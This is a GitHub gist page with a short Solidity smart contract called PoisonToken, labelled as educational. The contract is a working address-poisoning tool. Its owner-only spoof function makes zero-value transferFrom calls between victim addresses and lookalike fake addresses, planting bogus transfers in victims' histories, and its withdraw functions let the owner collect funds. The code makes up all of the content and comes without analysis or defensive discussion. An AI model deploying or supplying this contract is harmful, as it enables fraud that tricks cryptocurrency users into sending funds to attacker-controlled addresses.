Skip to content

Instantly share code, notes, and snippets.

@jtriley-eth

jtriley-eth/PoisonToken.sol Secret

Last active January 18, 2023 23:22
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jtriley-eth/c2efaaf8612f79de800406da6f3b5b61 to your computer and use it in GitHub Desktop.
Save jtriley-eth/c2efaaf8612f79de800406da6f3b5b61 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
PoisonToken.sol
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.17;
interface IERC20 {
function transfer(address receiver, uint256 amount) external returns (bool);
function transferFrom(address sender, address receiver, uint256 amount) external returns (bool);
}
/// @notice For Educational Purposes Only (duh).
contract PoisonToken {
error Auth();
error Arrays();
error TransferFail();
address internal immutable owner;
constructor() { owner = msg.sender; }
function withdrawToken(IERC20 token, address receiver, uint256 amount) external {
if (owner != msg.sender) revert Auth();
if (!token.transfer(receiver, amount)) revert TransferFail();
}
function withdraw(address receiver, uint256 amount) external {
if (owner != msg.sender) revert Auth();
(bool success,) = receiver.call{value: amount}("");
if (!success) revert TransferFail();
}
function spoof(IERC20 token, address[] calldata targets, address[] calldata fakes) external {
if (owner != msg.sender) revert Auth();
uint256 len = targets.length;
if (len != fakes.length) revert Arrays();
uint256 i;
unchecked {
for (i; i < len; ++i) {
address target = targets[i];
address fake = fakes[i];
if (!token.transferFrom(fake, target, 0)) revert TransferFail();
if (!token.transferFrom(target, fake, 0)) revert TransferFail();
}
}
}
receive() external payable {}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment